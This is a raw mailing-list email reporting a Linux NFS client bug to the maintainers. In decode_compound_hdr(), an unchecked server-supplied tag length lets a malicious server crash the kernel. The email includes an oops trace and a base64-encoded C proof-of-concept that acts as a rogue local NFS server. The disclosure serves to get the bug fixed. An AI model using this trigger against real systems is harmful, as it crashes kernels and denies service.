Received: by 2002:a05:6a10:5bc5:0:0:0:0 with SMTP id os5csp2098554pxb; Thu, 4 Nov 2021 14:04:07 -0700 (PDT) X-Google-Smtp-Source: ABdhPJxq/fz8OkyOr5FAMdkOgF3ktO/tNHjX06qiw8M+9xogZz49RvZ9Oa6+TDGbsmEO2t4JXNpb X-Received: by 2002:a05:6e02:1a2d:: with SMTP id g13mr8853049ile.301.1636059846888; Thu, 04 Nov 2021 14:04:06 -0700 (PDT) ARC-Seal: i=1; a=rsa-sha256; t=1636059846; cv=none; d=google.com; s=arc-20160816; b=NFtEUuubxReG6IukLG6FTB5KaragtgNlVeN4RFaxgyMKljmjulH5xKBnCf9weUSNGZ WnVkGVdEY+W64MUvBabCpc1vlwTS7z03xkczDAKdzf05HDla8XSv9hFXXQ3wLm0B9fDL 2+43PnbHlkARtyfTI2SfCFYjuVZVyYO1hjv/tbyFLQGGZwWjTcv9c+vhrKoupiGarGrS vjnTwWPMKUD2JJHAIhVDJ7tH25al5KXPgzS/CgCjQxhFyqXWXtIfoVkd7fXsqoogsMwM pUwA7VnXMHnv0KwTh6fvINRgtA4YxxU+WeoYT0Rjt1K2ZKFq+FJm1uvMlYGAAYhtVuVe DnHQ== ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816; h=list-id:precedence:message-id:date:mime-version:subject:reply-to :from:cc:to; bh=R6u0CC1zDlBYcVh+HlRRWzqshEdQuer4J66DALD6dbQ=; b=NxLhlOR3fWw1dkGhgg/sK/f0TALb/fQUaZJ5zz2lZ5PXBPxFUa4zWNNc+cjaCumh9A JAAJisM7RDYkPpd34TA89aUIalFv1HVefQjOMsPpngbSAs05TVyB5SnHaNkPxu0+H2U0 4PHPVls6BSFsk9yL+vYX7eDGxQCQmGG1kkrkq7zip2e2DVhTJ4h3e1j1bK6XptLQYZCO gu11VXbwD5kmIwMYi3e32xFp5MFAncpcDyILqNika1qpI+2v80kIHtt8WxaITy497fx2 dmZGcCh1lMwZftbSiYrZBvgAlzFXpYFkbsWDw+YFQdD6/rnrEXJN+o4rd4gpxiE80ezO gYCQ== ARC-Authentication-Results: i=1; mx.google.com; spf=pass (google.com: domain of linux-nfs-owner@vger.kernel.org designates 23.128.96.18 as permitted sender) smtp.mailfrom=linux-nfs-owner@vger.kernel.org; dmarc=fail (p=NONE sp=NONE dis=NONE) header.from=csail.mit.edu Return-Path: Received: from vger.kernel.org (vger.kernel.org. [23.128.96.18]) by mx.google.com with ESMTP id u12si968487ilv.57.2021.11.04.14.03.40; Thu, 04 Nov 2021 14:04:06 -0700 (PDT) Received-SPF: pass (google.com: domain of linux-nfs-owner@vger.kernel.org designates 23.128.96.18 as permitted sender) client-ip=23.128.96.18; Authentication-Results: mx.google.com; spf=pass (google.com: domain of linux-nfs-owner@vger.kernel.org designates 23.128.96.18 as permitted sender) smtp.mailfrom=linux-nfs-owner@vger.kernel.org; dmarc=fail (p=NONE sp=NONE dis=NONE) header.from=csail.mit.edu Received: (majordomo@vger.kernel.org) by vger.kernel.org via listexpand id S231849AbhKDUc5 (ORCPT + 99 others); Thu, 4 Nov 2021 16:32:57 -0400 Received: from outgoing-stata.csail.mit.edu ([128.30.2.210]:54786 "EHLO outgoing-stata.csail.mit.edu" rhost-flags-OK-OK-OK-OK) by vger.kernel.org with ESMTP id S231484AbhKDUc5 (ORCPT ); Thu, 4 Nov 2021 16:32:57 -0400 X-Greylist: delayed 1176 seconds by postgrey-1.27 at vger.kernel.org; Thu, 04 Nov 2021 16:32:56 EDT Received: from c-24-60-30-97.hsd1.ma.comcast.net ([24.60.30.97] helo=crash.local) by outgoing-stata.csail.mit.edu with esmtpsa (TLS1.2:DHE_RSA_AES_256_CBC_SHA256:256) (Exim 4.82) (envelope-from ) id 1mij4J-000Orl-HV; Thu, 04 Nov 2021 16:10:39 -0400 Received: from crash.local (localhost [127.0.0.1]) by crash.local (Postfix) with ESMTP id DBC2911E7E9AC; Thu, 4 Nov 2021 16:10:38 -0400 (EDT) To: Trond Myklebust , Anna Schumaker cc: linux-nfs@vger.kernel.org From: rtm@csail.mit.edu Reply-To: rtm@csail.mit.edu Subject: NFS client RPC bug MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="=-=-=" Date: Thu, 04 Nov 2021 16:10:38 -0400 Message-ID: <7517.1636056638@crash.local> Precedence: bulk List-ID: X-Mailing-List: linux-nfs@vger.kernel.org --=-=-= Content-Type: text/plain decode_compound_hdr() in fs/nfs/nfs4xdr.c adds the taglen supplied by the server to a pointer and then dereferences it, but does not first check taglen for sanity: p = xdr_inline_decode(xdr, 8); ...; hdr->taglen = be32_to_cpup(p); ...; p = xdr_inline_decode(xdr, hdr->taglen + 4); ...; p += XDR_QUADLEN(hdr->taglen); hdr->nops = be32_to_cpup(p); The second xdr_inline_decode() limits the opportunities for an attacker-controlled pointer dereference, but a taglen of 0xfffffffc will cause a kernel page fault. I've attached a program that tickles the bug on my kernel 5.15 machine: # uname -a Linux (none) 5.15.0-rc7-dirty #15 SMP Thu Nov 4 19:20:36 UTC 2021 riscv64 riscv64 riscv64 GNU/Linux # cc nfs_1.c # ./a.out mount:mount.nfs: timeout set for Thu Jan 1 00:02:12 1970 mount.nfs: trying text-based options 'vers=4.2,addr=127.0.0.1,clientaddr=127.0.0.1' accept returned 4 proc 0 proc 1 exception pc=0xffffffff8022dcd8 cause=d symbolic tval=0xffffffe102c5aad8 [ 16.101267] Unable to handle kernel paging request at virtual address ffffffe102c5aad8 [ 16.112762] Oops [#1] [ 16.116973] Modules linked in: [ 16.122429] CPU: 0 PID: 60 Comm: mount.nfs Not tainted 5.15.0-rc7-dirty #13 [ 16.131634] Hardware name: ucbbar,riscvemu-bare (DT) [ 16.138694] epc : decode_compound_hdr+0x96/0x12e [ 16.146706] ra : decode_compound_hdr+0x82/0x12e [ 16.154151] epc : ffffffff8022dcd8 ra : ffffffff8022dcc4 sp : ffffffd00057b6e0 ... [ 16.272291] status: 0000000200000121 badaddr: ffffffe102c5aad8 cause: 000000000000000d [ 16.282369] [] decode_compound_hdr+0x96/0x12e [ 16.290699] [] nfs4_xdr_dec_exchange_id+0x32/0x57e [ 16.299265] [] rpcauth_unwrap_resp_decode+0x12/0x1a [ 16.307926] [] rpcauth_unwrap_resp+0x12/0x1a [ 16.316196] [] call_decode+0x112/0x176 [ 16.323488] [] __rpc_execute+0x76/0x216 [ 16.330751] [] rpc_execute+0x58/0x7e [ 16.337966] [] rpc_run_task+0x12c/0x16c [ 16.345113] [] nfs4_run_exchange_id+0x1d8/0x262 [ 16.353364] [] _nfs4_proc_exchange_id+0x24/0x2ba [ 16.361556] [] nfs4_proc_exchange_id+0x30/0x50 [ 16.369829] [] nfs41_discover_server_trunking+0x1c/0xa8 [ 16.378421] [] nfs4_discover_server_trunking+0x7c/0x1e8 [ 16.386958] [] nfs4_init_client+0x92/0xf6 [ 16.394014] [] nfs_get_client+0x36a/0x394 [ 16.401147] [] nfs4_set_client+0xd6/0x13e [ 16.410346] [] nfs4_create_server+0xb8/0x208 [ 16.421493] [] nfs4_try_get_tree+0x16/0x4c [ 16.432759] [] nfs_get_tree+0x34a/0x3ac [ 16.442283] [] vfs_get_tree+0x18/0x88 [ 16.451889] [] path_mount+0x4f4/0x77a [ 16.461619] [] do_mount+0x4c/0x7e [ 16.470833] [] sys_mount+0xca/0x14e [ 16.480401] [] ret_from_syscall+0x0/0x2 --=-=-= Content-Type: application/octet-stream Content-Disposition: attachment; filename=nfs_1.c Content-Transfer-Encoding: base64 I2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxzdGRsaWIuaD4KI2luY2x1ZGUgPHVuaXN0ZC5o PgojaW5jbHVkZSA8c3RyaW5nLmg+CiNpbmNsdWRlIDxzeXMvc29ja2V0Lmg+CiNpbmNsdWRlIDxz eXMvaW9jdGwuaD4KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4KI2luY2x1ZGUgPHN5cy93YWl0Lmg+ CiNpbmNsdWRlIDxzeXMvcmVzb3VyY2UuaD4KCnVuc2lnbmVkIGxvbmcgbG9uZyBhYWFbXSA9IHsK MHgwdWxsLAoweDB1bGwsCjB4MHVsbCwKMHgwdWxsLAoweDB1bGwsCjB4MHVsbCwKMHgwdWxsLAow eDB1bGwsCjB4MHVsbCwKMHgwdWxsLAoweDB1bGwsCjB4MHVsbCwKMHgwdWxsLAoweDB1bGwsCjB4 MHVsbCwKMHgwdWxsLAoweDB1bGwsCjB4MHVsbCwKMHgwdWxsLAoweDMwMDAwMDAwMDAwMDAwMHVs bCwKMHgwdWxsLAoweDB1bGwsCjB4MHVsbCwKMHgwdWxsLAoweDB1bGwsCjB4MHVsbCwKMHgwdWxs LAoweDB1bGwsCjB4MHVsbCwKMHgwdWxsLAoweDB1bGwsCjB4MHVsbCwKMHgwdWxsLAoweDB1bGws CjB4MHVsbCwKMHgwdWxsLAoweDB1bGwsCjB4MHVsbCwKMHgwdWxsLAoweDB1bGwsCjB4MHVsbCwK MHgwdWxsLAoweDB1bGwsCjB4MHVsbCwKMHgwdWxsLAoweDB1bGwsCjB4MHVsbCwKMHgwdWxsLAow eDB1bGwsCjB4MHVsbCwKMHgwdWxsLAoweDB1bGwsCjB4MHVsbCwKMHgwdWxsLAoweDB1bGwsCjB4 MHVsbCwKMHgwdWxsLAoweDB1bGwsCjB4MHVsbCwKMHgwdWxsLAoweDB1bGwsCjB4MHVsbCwKMHgw dWxsLAoweDB1bGwsCn07CmludCBpaWkgPSAwOwoKaW50IHJlYWRuKGludCBmZCwgY2hhciAqYnVm LCBpbnQgbikgewogIGludCBvcmlnID0gbjsKICB3aGlsZShuID4gMCl7CiAgICBpbnQgY2MgPSBy ZWFkKGZkLCBidWYsIG4pOwogICAgaWYoY2MgPD0gMCkgeyBwZXJyb3IoInJlYWQiKTsgcmV0dXJu IC0xOyB9CiAgICBuIC09IGNjOwogICAgYnVmICs9IGNjOwogIH0KICByZXR1cm4gb3JpZzsKfQoK aW50Cm1haW4oKXsKICBzdHJ1Y3QgcmxpbWl0IHI7CiAgci5ybGltX2N1ciA9IHIucmxpbV9tYXgg PSAwOwogIHNldHJsaW1pdChSTElNSVRfQ09SRSwgJnIpOwoKICBpbnQgcyA9IHNvY2tldChBRl9J TkVULCBTT0NLX1NUUkVBTSwgMCk7CiAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsKICBtZW1zZXQo JnNpbiwgMCwgc2l6ZW9mKHNpbikpOwogIHNpbi5zaW5fZmFtaWx5ID0gQUZfSU5FVDsKICBzaW4u c2luX3BvcnQgPSBodG9ucygyMDQ5KTsKICBpZihiaW5kKHMsIChzdHJ1Y3Qgc29ja2FkZHIgKikm c2luLCBzaXplb2Yoc2luKSkgPCAwKXsKICAgIHBlcnJvcigiYmluZCIpOyBleGl0KDEpOwogIH0K ICBsaXN0ZW4ocywgMTApOwogIHN5bmMoKTsgc2xlZXAoMSk7IHNsZWVwKDEpOyBzbGVlcCgxKTsK CiAgaWYoZm9yaygpID09IDApewogICAgaWYoc3lzdGVtKCJlY2hvIC1uIG1vdW50OiA7IG1vdW50 IC12IC10IG5mcyAxMjcuMC4wLjE6L3RtcCAvbW50IikgPT0gMCl7CiAgICAgIHN5c3RlbSgiZWNo byAtbiBsczogOyBscyAtbCAvbW50Ly4gL21udC96Iik7CiAgICAgIHN5c3RlbSgiZWNobyAtbiBl Y2hvOiA7IGVjaG8gaGkgPiAvbW50L3giKTsKICAgICAgc3lzdGVtKCJlY2hvIC1uIHVtb3VudDog OyB1bW91bnQgL21udCIpOwogICAgfQogICAgZXhpdCgwKTsKICB9CgogIGlmKGZvcmsoKSA9PSAw KXsKI2RlZmluZSBOQUEgNjQKICAgIHVuc2lnbmVkIGxvbmcgbG9uZyBhYVtOQUFdOwogICAgZm9y KGludCBpID0gMDsgaSA8IE5BQTsgaSsrKSBhYVtpXSA9IGFhYVtpaWkrK107CiAgICBpbnQgaWkg PSAwOwoKICAgIHNvY2tsZW5fdCBzaW5sZW4gPSBzaXplb2Yoc2luKTsKICAgIGludCBzMSA9IGFj Y2VwdChzLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4sICZzaW5sZW4pOwogICAgcHJpbnRmKCJh Y2NlcHQgcmV0dXJuZWQgJWRcbiIsIHMxKTsKICAgIGlmKHMxIDwgMCkgeyBwZXJyb3IoImFjY2Vw dCIpOyBleGl0KDEpOyB9CiAgICBjbG9zZShzKTsKICAKICAgIHdoaWxlKDEpewogICAgICB1bnNp Z25lZCBpbnQgaWxlbjsKICAgICAgaWYocmVhZG4oczEsIChjaGFyKikmaWxlbiwgNCkgPCAwKSBi cmVhazsKICAgICAgaWxlbiA9IG50b2hsKGlsZW4pOwogICAgICBpbGVuICY9IDB4N2ZmZmZmZmY7 CiAgICAgIGNoYXIgaWJ1ZlsxMDI0XTsKICAgICAgaWYocmVhZG4oczEsIChjaGFyKilpYnVmLCBp bGVuKSA8IDApIGJyZWFrOwogICAgICBpbnQgeGlkID0gKihpbnQqKShpYnVmKzApOwogICAgICBp bnQgcHJvYyA9IG50b2hsKCooaW50KikoaWJ1ZisyMCkpOwogICAgICBwcmludGYoInByb2MgJWRc biIsIHByb2MpOwogICAgICAKICAgICAgY2hhciBvYnVmWzEyOF07CiAgICAgIGludCBvbGVuID0g c2l6ZW9mKG9idWYpOwogICAgICBpbnQgZHVtbXkgPSBodG9ubChvbGVuIHwgMHg4MDAwMDAwMCk7 CiAgICAgIHdyaXRlKHMxLCAmZHVtbXksIDQpOwogICAgICBtZW1zZXQob2J1ZiwgMHhmZiwgc2l6 ZW9mKG9idWYpKTsKICAgICAgZm9yKGludCBpID0gMDsgaSs4IDw9IHNpemVvZihvYnVmKSAmJiBp aSA8IE5BQTsgaSArPSA4KQogICAgICAgICoodW5zaWduZWQgbG9uZyBsb25nICopKG9idWYgKyBp KSBePSBhYVtpaSsrXTsKICAgICAgKihpbnQqKShvYnVmKzApID0geGlkOwogICAgICAqKGludCop KG9idWYrNCkgPSBodG9ubCgxKTsgLy8gUkVQTFkKICAgICAgKihpbnQqKShvYnVmKzgpID0gaHRv bmwoMCk7IC8vIE1TR19BQ0NFUFRFRAogICAgICAqKGludCopKG9idWYrMTIpID0gaHRvbmwoMCk7 IC8vIG9wYXF1ZV9hdXRoIGZsYXZvciA9IEFVVEhfTlVMTAogICAgICAqKGludCopKG9idWYrMTYp ID0gaHRvbmwoMCk7IC8vIG9wYXF1ZV9hdXRoIGxlbmd0aAogICAgICAqKGludCopKG9idWYrMjAp ID0gaHRvbmwoMCk7IC8vIFNVQ0NFU1MKICAgICAgaWYod3JpdGUoczEsIG9idWYsIG9sZW4pPD0w KSBwZXJyb3IoIndyaXRlIik7CiAgICB9CiAgICBleGl0KDEpOwogIH0KICBjbG9zZShzKTsKICBz bGVlcCg3KTsKfQo= --=-=-=--